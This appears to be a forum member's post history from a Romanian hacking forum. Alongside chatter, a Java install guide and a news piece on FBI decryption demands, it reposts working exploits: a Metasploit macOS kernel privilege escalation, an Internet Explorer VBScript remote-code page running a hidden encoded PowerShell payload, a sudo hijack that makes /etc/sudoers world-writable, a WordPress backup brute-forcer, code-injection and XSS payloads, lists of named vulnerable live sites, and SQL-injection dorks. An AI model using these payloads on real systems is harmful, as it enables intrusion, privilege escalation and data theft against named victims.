Aerosol
-
Posts
3453 -
Joined
-
Last visited
-
Days Won
22
Everything posted by Aerosol
-
@quadxenon era o gluma Totusi 2. Miliarde de view e ceva...
-
Hai multam, o sa iau niste carti si am sa le postez si pe RST
-
Ba astia cand intra pe google, zic cei de la google ca primesc flood On://2 miliarde de vizualizari ....
-
Cauta in continuare poate o sa ai noroc
-
stau si ma gandesc care e mai prost M.Badea sau Gadea?
-
@Eddie91 sa traiesti bre sunt foarte frumoase plus am gasit ceva ce cautam de mult timp Splatter Displacement Action | GraphicRiver inca o data multam.
-
Mai mult ca sigur e de la campul electromagnetic al centralei
-
Salut, apropo mai usor cu ":) :X" si deastea nu suntem pe mess.
-
1. Download the latest Java SE SDK version. Java SE - Downloads | Oracle Technology Network | Oracle At the time of writing the filename and version was jdk-7u17-linux-x64.tar.gz 2. Untar the Archive tar -xzvf /root/jdk-7u17-linux-x64.tar.gz mv jdk1.7.0_17 /opt cd /opt/jdk1.7.0_17 3.This step registers the downloaded version of Java as an alternative, and switches it to be used as the default: update-alternatives --install /usr/bin/java java /opt/jdk1.7.0_17/bin/java 1 update-alternatives --install /usr/bin/javac javac /opt/jdk1.7.0_17/bin/javac 1 update-alternatives --install /usr/lib/mozilla/plugins/libjavaplugin.so mozilla-javaplugin.so /opt/jdk1.7.0_17/jre/lib/amd64/libnpjp2.so 1 update-alternatives --set java /opt/jdk1.7.0_17/bin/java update-alternatives --set javac /opt/jdk1.7.0_17/bin/javac update-alternatives --set mozilla-javaplugin.so /opt/jdk1.7.0_17/jre/lib/amd64/libnpjp2.so Source
-
Source ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = ManualRanking # Can cause kernel crash include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => 'Mac OS X IOKit Keyboard Driver Root Privilege Escalation', 'Description' => %q{ A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel pointers can also be leaked, allowing a full kASLR bypass. Tested on Mavericks 10.9.5, and should work on previous versions. The issue has been patched silently in Yosemite. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ian Beer', # discovery, advisory, publication, and a most excellent blog post 'joev' # copy/paste monkey ], 'References' => [ [ 'CVE', '2014-4404' ], [ 'URL', 'http://googleprojectzero.blogspot.com/2014/11/pwn4fun-spring-2014-safari-part-ii.html' ], # Heap overflow: [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=40' ], # kALSR defeat: [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=126' ] ], 'Platform' => 'osx', 'Arch' => ARCH_X86_64, 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [ [ 'Mac OS X 10.9.5 Mavericks x64 (Native Payload)', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 24 2014' )) end def check if ver_lt(osx_ver, "10.10") Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end end def exploit exploit_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2014-4404') binary_exploit = File.read(File.join(exploit_path, 'key_exploit')) binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded) exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" print_status("Writing exploit file as '#{exploit_file}'") write_file(exploit_file, binary_exploit) register_file_for_cleanup(exploit_file) print_status("Writing payload file as '#{payload_file}'") write_file(payload_file, binary_payload) register_file_for_cleanup(payload_file) print_status("Executing payload...") cmd_exec("chmod +x #{exploit_file}") cmd_exec("chmod +x #{payload_file}") cmd_exec("#{exploit_file} #{payload_file}") end def osx_ver cmd_exec("sw_vers -productVersion").to_s.strip end def ver_lt(a, Gem::Version.new(a) < Gem::Version.new( end end
-
The FBI has made it no secret that it hates Apple and Google's efforts to encrypt files in your smartphones and tablets. Now court documents have emerged showing just how far the Feds are willing to go to decrypt citizens' data. The paperwork has shown two cases where federal prosecutors have cited the All Writs Act – which was enacted in 1789 as part of the Judiciary Act – to force companies to decrypt information on gadgets. The Act, which was signed into law by none other than George Washington and later revised in the 20th century, gives the courts the right to... issue all writs necessary or appropriate in aid of their respective jurisdictions and agreeable to the usages and principles of law. That's a pretty broad remit, but the Feds think it's just the thing to force Apple and others to break down privacy protections. Last month, New York prosecutors successfully persuaded a judge that the ancient law could be used to force an unnamed smartphone manufacturer to help unlock a phone allegedly used in a credit card fraud case. The judge ordered the manufacturer to offer "reasonable technical assistance" to make the phone's contents available. In a second case, in the northern California federal court, prosecutors specifically named Apple in a similar case using the All Writs Act. Documents obtained by Ars Technica show federal law enforcement sought to get Apple to unlock an iPhone 5S as part of a criminal case. The court filing states investigators were unwilling to try and open the iPhone for fear of damaging a crucial piece of evidence. They asked the courts to force Apple to give them a hand in safely extracting data from the passcode-protected phone. It's an interesting legal tactic, but the Feds may find out the hard way that the All Writs Act has its limitation. The argument used by Apple and Google over encryption is that, even if they wanted to help the Feds, they can't do anything about it – because modern iOS and Android encrypts data in a way that only the owner can decrypt. Apple and Google say they don't hold any skeleton keys to devices, although sensitive data may end up in the cloud for the cops to seize. "The court orders contemplate allowing companies to file an objection and if they can’t do it then Apple and Google would spend real time fighting this," EFF legal fellow Andrew Crocker told The Register. As for whether or not this law could be used to force smartphone sellers to include a backdoor or spyware for police, or even a front door as the FBI says it wants, Crocker said that such use of the All Writs Act isn't "a settled legal issue," and the EFF would be taking a long, hard look at any attempts to do so. Source -
@misefalfaie stiu bre Bratuleanu vezi ca misefalfaie face misto de tine prietene, daca te uitai la final scria sursa da mna sa comentezi si tu...
-
@aelius multumesc pentru completare, hm eu am vazut ca e postat pe 20 nov 2014 pe Packet Storm am dat search pe forum si nu am gasit nimic si am zis ca mna...
-
@Ganav desi nu am nici-o legatura cu asta. andrey asta e defapt teparul https://rstforums.com/forum/92884-un-tepar-se-alge-cu-situl-descoperit.rst uite aici o sa te lamuresti + tema e nulled deci nu a dat nici-un ban pe ea + s-a incurcat in propriile minciuni
-
tcpdump 4.6.2 AOVD Unreliable Output tcpdump 4.6.2 Geonet Denial Of Service tcpdump 4.6.2 OSLR Denial Of Service Ha, ha am gasit si cateva exploit-uri interesante CVE-2014-8767 tcpdump denial of service in verbose mode using malformed OLSR payload 1. Background tcpdump is a powerful command-line packet analyzer. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. 2. Summary Information It was found out that malformed network traffic (OLSR-based) can lead to an application crash (denial of service) if verbose output of tcpdump monitoring the network is used. 3. Technical Description The application decoder for the OLSR protocol fails to perform external input validation and performs insufficient checking on length computations leading to an unsafe decrement and underflow in the function olsr_print (const u_char *pptr, u_int length, int is_ipv6) In this function msg_len is extracted from the input without sufficient checks and subtracted sizeof(struct olsr_msg4) which leads to an underflow of msg_tlen which is used to call olsr_print_neighbor() which will crash. In case DNS reverse lookup is enabled, this will also lead to a large amount of invalid DNS reverse lookups. To reproduce start tcpdump on a network interface sudo tcpdump -i lo -s 0 -n -v (running the program with sudo might hide the segfault message on certain environments, see dmesg for details) and use the following python program to generate a frame on the network (might also need sudo): #!/usr/bin/env python from socket import socket, AF_PACKET, SOCK_RAW s = socket(AF_PACKET, SOCK_RAW) s.bind(("lo", 0)) olsr_frame = "\x00\x1b\xc6\x51\x35\x97\x00\x24\x8c\x7a\xff\x6f\x08\x00\x45\x15\x00\x3d\xf3\x7f\x40\x00\x4d\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\xba\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x01\x00\x00\x00" s.send(olsr_frame) 4. Affected versions Affected versions are 3.9.6 through 4.6.2 5. Fix The problem is fixed in the upcoming version tcpdump 4.7.0 6. Advisory Timeline 2014-11-08 Discovered 2014-11-09 Requested CVE 2014-11-11 Reported vendor by email 2014-11-12 Vendor made a fix available as repository patch 2014-11-13 CVE number received 2014-11-13 Published CVE advisory 7. Credit The issue was found by Steffen Bauch Twitter: @Steffenbauch [url]http://steffenbauch.de[/url] using a slightly enhanced version of american fuzzy lop ([url]https://code.google.com/p/american-fuzzy-lop/[/url]) created by Michal Zalewski.
-
What is sudo's grace period? When a user first call sudo to launch some commands as root he will be asked for his own password. But if the user calls sudo again in the following 5 minutes, he won't be asked for the same password. That's because the password is cached in memory for a period of time called the « grace period ». This grace period mechanism is activated by default on every systems I know where sudo can be found (Linux distros, OSX, BSDs…) Here is the exploit code (sudo_grace_period_exploit.sh) : function bash_history { if [ $? -ne 1 ] # previous command was successfull then if [ -z "${PWNED+xxx}" ] # this test is used to check if the system was already pwned then history 1 | grep -q -E '^[[:space:]]*[0-9]+ sudo ' if [ $? -eq 0 ] # previous command is a sudo one then sudo chmod 777 /etc/sudoers 2> /dev/null PWNED="yes" unset PROMPT_COMMAND 2> /dev/null fi fi fi } PROMPT_COMMAND=bash_history For More : http://dl.packetstormsecurity.net/1411-exploits/exploiting_sudo_grace_period.pdf Dupa mine este foarte interesata treaba. Sacrificati din timpul vostru 5 minute, merita!
-
<!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <body> <pre> |--------------------------------------------------------------------------| | Title: OLE Automation Array Remote Code Execution => Pre IE11 | | Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/ | | Rework: GradiusX (francescomifsud@gmail.com ) & b33f (@FuzzySec) | | Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual | | Usage: http://www.fuzzysecurity.com/exploits/21.html | |--------------------------------------------------------------------------| Very nice black-magic yuange, don't think it went unnoticed that you have been popping shells since 2009 ??????????? |--------------------------------------------------------------------------| </pre> <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") 'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!' text='Powershell FTW!' payload="nVVdi9tGFH33rxiMHmzWWkYafTlmIWlDIVBCYZf2wfhhNBp1RWXJyHLqTZv/Xp1jXzfbvIS+zOed+3HOuVLg1IN6O59t37fth/2hH8bF/A8/dL418X3VtvPlTh1OZds4dRztOE3+PE736kM3/jIO6tdmGE+2fde2vVtcz/5cqVPTjep8nV+u8+fl5n/H+XHwdvRPz9NUSZzT1e+nlfo38nX1VezryX+j74+f3DB+T+y93x/9uPjW862q+dtZ0E9Avquq8Onl4FU4vSn98N7XTdeMTd+pwKnwo917Nf+t6Uw8V2E37Y4H67ziyU+nzsHyqMKDPR7H5+E0C84PQf/mzSuQ9UqfI60xmcuU6OVGbX94Gf12twuOYFSfSzvdlH4a0nIaqnoadIIVLlyF1XoacpzFGGoMKS5MBBPcllglsZylKYJjq82rbYFtjkApAhl4qfkC0YpSVjHs4mIaMgwWMTy8aHhxGOIMDnKY4FmSSwZJJsUweIwzywwAQoZVBWODojOcFTDJnJwlWEUImaDUAsYOrjTfOkGIzwxWDsVERA0mKbOiSSaQlE5KveCSSvYpb1lbJdmXpAu5WJpoiaFRVpRL4uQjIUwstbxFY/kwsYDTYlsjhkdZa+bCisj+WgAzRnJ2GGwsbGVWmPYwyZBLgUA1TNbEvhQCclwUMI5g5wrRCzN1pTAdZVJvokV6eSyuCCLR1dRfLtjTAcVAOC0c+FpqIy4+kVwuNFqhlgjVTgjInZCca8GgYBp4VuFF4UQ5OR0QXSNxHTmHcU2VYIi8SI89UxIrbD1u4/WtNmoSkBhkmhYiM4vBpcJ5iQvKu85EFvRiE8mAqbFXSRnB1kic3UN0CbZln99WFu7ZW449SEKtaCjLhWn2L+kmRwwUkW6qCTGo3UKLQBLYsY+ocSJOV57y5rckFm1UbNhYZMZ+uxBAV6mwcOkPwnnrvALD2kjlbGIWQyFlN6kwe4LNXiCDrJJvK0rUCKamlEDUGnEhySlQ44cxgtOMRaeSqXUiH34izVoqj9zqa53WVJi5VamFClYZ10xoM6v7QS2C5kFvgkaFrZ82R3f/s+9+H5/DaDmd3t0t1V/48F//PNvLr2e3CM73T/20MfFieRc0y5Wanm6DZrdS0VL9rfrTGHantt18mQWf+et49d+cEloF5xUm/DIeRzuM4WPr/UGFj971XaXwZ9H6Hw==" command="Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" params="-NoP -NonI -Exec Bypass -Command " & command 'Original POC yuange 'set shell=createobject("Shell.Application") 'shell.ShellExecute "notepad.exe" 'With UAC 'shell.ShellExecute "powershell", params, "", "runas", 0 'Without UAC shell.ShellExecute "powershell", params, "", "", 0 end function </script> <SCRIPT LANGUAGE="VBScript"> dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script> </body> </html> Source
-
Vulnerability title: Code Injection in Wordpress CM Download Manager plugin CVE: CVE-2014-8877 Plugin: CM Download Manager plugin Vendor: CreativeMinds - https://www.cminds.com/ Product: https://wordpress.org/plugins/cm-download-manager/ Affected version: 2.0.0 and previous version Fixed version: 2.0.4 Google dork: inurl:cmdownloads Reported by: Phi Le Ngoc - phi.n.le@itas.vn Credits to ITAS Team - www.itas.vn ::DESCRITION:: The code injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker gains full control of the application and the ability to use any operating system functions that are available to the scripting environment. GET /cmdownloads/?CMDsearch=".phpinfo()." HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: _ga=GA1.2.1698795018.1415614778; _gat=1; PHPSESSID=okt6c51s4esif2qjq451ati7m6; cmdm_disclaimer=Y; JSB=1415614988879 Connection: keep-alive Vulnerable file:/wp-content/plugins/cm-download-manager/lib/controllers/CmdownloadController.php Vulnerable code: (Line: 130 -> 158) public static function alterSearchQuery($search, $query) { if( ( (isset($query->query_vars['post_type']) && $query->query_vars['post_type'] == CMDM_GroupDownloadPage::POST_TYPE) && (!isset($query->query_vars['widget']) || $query->query_vars['widget'] !== true) ) && !$query->is_single && !$query->is_404 && !$query->is_author && isset($_GET['CMDsearch']) ) { global $wpdb; $search_term = $_GET['CMDsearch']; if( !empty($search_term) ) { $search = ''; $query->is_search = true; // added slashes screw with quote grouping when done early, so done later $search_term = stripslashes($search_term); preg_match_all('/".*?("|$)|((?<=[\r\n\t ",+])|^)[^\r\n\t ",+]+/', $search_term, $matches); $terms = array_map('_search_terms_tidy', $matches[0]); $n = '%'; $searchand = ' AND '; foreach((array) $terms as $term) { $term = esc_sql(like_escape($term)); $search .= "{$searchand}(($wpdb->posts.post_title LIKE '{$n}{$term}{$n}') OR ($wpdb->posts.post_content LIKE '{$n}{$term}{$n}'))"; } add_filter('get_search_query', create_function('$q', 'return "' . $search_term . '";'), 99, 1); remove_filter('posts_request', 'relevanssi_prevent_default_request'); remove_filter('the_posts', 'relevanssi_query'); } } return $search; } ::SOLUTION:: Update to version 2.0.4 ::DISCLOSURE:: 2014-11-08 initial vendor contact 2014-11-10 vendor response 2014-11-10 vendor confirmed 2014-11-11 vendor release patch 2014-11-14 public disclosure ::REFERENCE:: https://downloadsmanager.cminds.com/release-notes/ http://www.itas.vn/news/code-injection-in-cm-download-manager-plugin-66.html?language=en ::COPYRIGHT:: Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP. Source
-
#!/bin/bash #Larry W. Cashdollar, @_larry0 #Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 plugin installed for any backups done on #20141031 assumes the wordpress database is wordpress and the table prefix is wp_ #http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/ #http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/ #run ./exp targetsite DATE="20141031"; #Date to search if [ ! -e rainbow ]; then cat << -EOF- > rbow.c /*Create rainbow table for guessing wp-backup-db v2.2.4 backup path Larry W. Cashdollar*/ #include <stdio.h> int main (void) { char string[16] = "0123456789abcdef"; int x, y, z, a, b; for (x = 0; x < 16; x++) for (y = 0; y < 16; y++) for (z = 0; z < 16; z++) for (a = 0; a < 16; a++) for (b = 0; b < 16; b++) printf ("%c%c%c%c%c\n", string[x], string[y], string[z], string[a], string[b]); return(0); } -EOF- echo "[+] Compiling rbow.c" gcc rbow.c -o rbow echo "[+] Creating rainbow table..." ./rbow > rainbow fi if [ ! -e found.txt ]; then Z=0 K=`wc -l rainbow|awk '{print $1}'`; echo "[+] Searching...."; for x in `cat rainbow`; do CPATH="http://$1/wp-content/backup-$x/"; RESULT=`curl -s --head $CPATH|grep 200`; if [ -n "$RESULT" ]; then echo "[+] Location $CPATH Found"; echo "[+] Received $RESULT"; echo $x > found.txt; break; #break here fi; echo -n "Percent Done: "; Y=`echo "scale=6;($Z/$K)*100"|bc`; echo -n $Y echo "%"; Z=$(( $Z + 1 )); done else x=`cat found.txt`; fi # Now that we have the directory lets try to locate the database backup file. K=999; for y in `seq -w 0 999`; do CPATH="http://$1/wp-content/backup-$x/wordpress_wp_$2_$y.sql"; #change WP Database Name and Table Prefix here RESULT=`curl -s --head $CPATH|grep 200`; if [ -n "$RESULT" ]; then echo "[+] Database backup $CPATH Found"; echo "[+] Received $RESULT"; wget $CPATH exit; #break here fi; echo -n "Percent Done: "; Y=`echo "scale=2;($Z/$K)*100"|bc`; echo -n $Y echo "%"; Z=$(( $Z + 1 )); done Source
-
WordPress - (Html5 Mp3 Player with Playlist) Plugin <= Full Path Disclosure ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com [~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon, PRoMaX, ZoRLu, ( milw00rm.com ) .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~App. : WordPress - (html5-mp3-player-with-playlist) Plugin |~Software: https://wordpress.org/plugins/html5-mp3-player-with-playlist/ |~Software: https://github.com/wp-plugins/html5-mp3-player-with-playlist/tree/master/html5plus |~Vulnerability Style : FULL PATH DISCLOSURE |[~]Date : "26.11.2014" |[~]Tested on : Kali Linux, Windows 7 |DORK: inurl:html5plus/html5full.php ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | DEMO : http://childhelpline.org.kh/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://falkopingstrumkar.se/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://groupe-komett.com//wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://www.nethinimnet.com/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://vedanet.com/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://auricle.org.nz/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://www.miguelguldimann.com/shop/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://cp2.leos.co.il/~yossimoadi/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://www.ambedkaritepartyofindia.org/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php http://www.zionchurchmillersville.com/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php .. .. .. etc ==============[Exploitation]=============================== http://[VICTIM]/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php Source
-
WordPress (Sexy Squeeze Pages) Plugin <= Reflected XSS Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com [~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon, PRoMaX, ZoRLu, ( milw00rm.com ) .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~App. : WordPress (Sexy Squeeze Pages) Plugin |~Software: http://instasqueeze.com/jv/ |~Vulnerability Style : Cross Site Scripting |[~]Date : "26.11.2014" |[~]Tested on : Kali Linux, Windows 7 |DORK: inurl:wp-content/plugins/instasqueeze ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | DEMO : http://instasqueeze.com ( Official ) http://gogglerank.com/ http://kangenwaterhq.com http://visualhandsconnect.com http://cynthialeecreations.com ==============[Exploitation]=============================== /instasqueeze/lp/index.php id parameter is ( index.php ) not safe. HTTP://[VICTIM]/wp-content/plugins/instasqueeze/lp/index.php?id="><script>alert(1337)</script> Source
-
Credit's : The Phant0m about.php?cartID= accinfo.php?cartId= acclogin.php?cartID= add.php?bookid= add_cart.php?num= addcart.php? addItem.php add-to-cart.php?ID= addToCart.php?idProduct= addtomylist.php?ProdId= adminEditProductFields.php?intProdID= advSearch_h.php?idCategory= affiliate.php?ID= affiliate-agreement.cfm?storeid= affiliates.php?id= ancillary.php?ID= archive.php?id= article.php?id= phpx?PageID basket.php?id= Book.php?bookID= book_list.php?bookid= book_view.php?bookid= BookDetails.php?ID= browse.php?catid= browse_item_details.php Browse_Item_Details.php?Store_Id= buy.php? buy.php?bookid= bycategory.php?id= cardinfo.php?card= cart.php?action= cart.php?cart_id= cart.php?id= cart_additem.php?id= cart_validate.php?id= cartadd.php?id= cat.php?iCat= catalog.php catalog.php?CatalogID= catalog_item.php?ID= catalog_main.php?catid= category.php category.php?catid= category_list.php?id= categorydisplay.php?catid= checkout.php?cartid= checkout.php?UserID= checkout_confirmed.php?order_id= checkout1.php?cartid= comersus_listCategoriesAndProducts.php?idCategory= comersus_optEmailToFriendForm.php?idProduct= comersus_optReviewReadExec.php?idProduct= comersus_viewItem.php?idProduct= comments_form.php?ID= contact.php?cartId= content.php?id= customerService.php?****ID1= default.php?catID= description.php?bookid= details.php?BookID= details.php?Press_Release_ID= details.php?Product_ID= details.php?Service_ID= display_item.php?id= displayproducts.php downloadTrial.php?intProdID= emailproduct.php?itemid= emailToFriend.php?idProduct= events.php?ID= faq.php?cartID= faq_list.php?id= faqs.php?id= feedback.php?title= freedownload.php?bookid= fullDisplay.php?item= getbook.php?bookid= GetItems.php?itemid= giftDetail.php?id= help.php?CartId= home.php?id= index.php?cart= index.php?cartID= index.php?ID= info.php?ID= item.php?eid= item.php?item_id= item.php?itemid= item.php?model= item.php?prodtype= item.php?shopcd= item_details.php?catid= item_list.php?maingroup item_show.php?code_no= itemDesc.php?CartId= itemdetail.php?item= itemdetails.php?catalogid= learnmore.php?cartID= links.php?catid= list.php?bookid= List.php?CatID= listcategoriesandproducts.php?idCategory= modline.php?id= myaccount.php?catid= news.php?id= order.php?BookID= order.php?id= order.php?item_ID= OrderForm.php?Cart= page.php?PartID= payment.php?CartID= pdetail.php?item_id= powersearch.php?CartId= price.php privacy.php?cartID= prodbycat.php?intCatalogID= prodetails.php?prodid= prodlist.php?catid= product.php?bookID= product.php?intProdID= product_info.php?item_id= productDetails.php?idProduct= productDisplay.php productinfo.php?item= productlist.php?ViewType=Category&CategoryID= productpage.php products.php?ID= products.php?keyword= products_category.php?CategoryID= products_detail.php?CategoryID= productsByCategory.php?intCatalogID= prodView.php?idProduct= promo.php?id= promotion.php?catid= pview.php?Item= resellers.php?idCategory= results.php?cat= savecart.php?CartId= search.php?CartID= searchcat.php?search_id= Select_Item.php?id= Services.php?ID= shippinginfo.php?CartId= shop.php?a= shop.php?action= shop.php?bookid= shop.php?cartID= shop_details.php?prodid= shopaddtocart.php shopaddtocart.php?catalogid= shopbasket.php?bookid= shopbycategory.php?catid= shopcart.php?title= shopcreatorder.php shopcurrency.php?cid= shopdc.php?bookid= shopdisplaycategories.php shopdisplayproduct.php?catalogid= shopdisplayproducts.php shopexd.php shopexd.php?catalogid= shopping_basket.php?cartID= shopprojectlogin.php shopquery.php?catalogid= shopremoveitem.php?cartid= shopreviewadd.php?id= shopreviewlist.php?id= ShopSearch.php?CategoryID= shoptellafriend.php?id= shopthanks.php shopwelcome.php?title= show_item.php?id= show_item_details.php?item_id= showbook.php?bookid= showStore.php?catID= shprodde.php?SKU= specials.php?id= store.php?id= store_bycat.php?id= store_listing.php?id= Store_ViewProducts.php?Cat= store-details.php?id= storefront.php?id= storefronts.php?title= storeitem.php?item= StoreRedirect.php?ID= subcategories.php?id= tek9.php? template.php?Action=Item&pid= topic.php?ID= tuangou.php?bookid= type.php?iType= updatebasket.php?bookid= updates.php?ID= view.php?cid= view_cart.php?title= view_detail.php?ID= viewcart.php?CartId= viewCart.php?userID= viewCat_h.php?idCategory= viewevent.php?EventID= viewitem.php?recor= viewPrd.php?idcategory= ViewProduct.php?misc= voteList.php?item_ID= whatsnew.php?idCategory= WsAncillary.php?ID= WsPages.php?ID=noticiasDetalle.php?xid= sitio/item.php?idcd= index.php?site= de/content.php?page_id= gallerysort.php?iid= products.php?type= event.php?id= showfeature.php?id= home.php?ID= tas/event.php?id= profile.php?id= details.php?id= past-event.php?id= index.php?action= site/products.php?prodid= page.php?pId= resources/vulnerabilities_list.php?id= site.php?id= products/index.php?rangeid= global_projects.php?cid= publications/view.php?id= display_page.php?id= pages.php?ID= lmsrecords_cd.php?cdid= product.php?prd= cat/?catid= products/product-list.php?id= debate-detail.php?id= cbmer/congres/page.php?LAN= content.php?id= news.php?ID= photogallery.php?id= index.php?id= product/product.php?product_no= nyheder.htm?show= book.php?ID= print.php?id= detail.php?id= book.php?id= content.php?PID= more_detail.php?id= content.php?id= view_items.php?id= 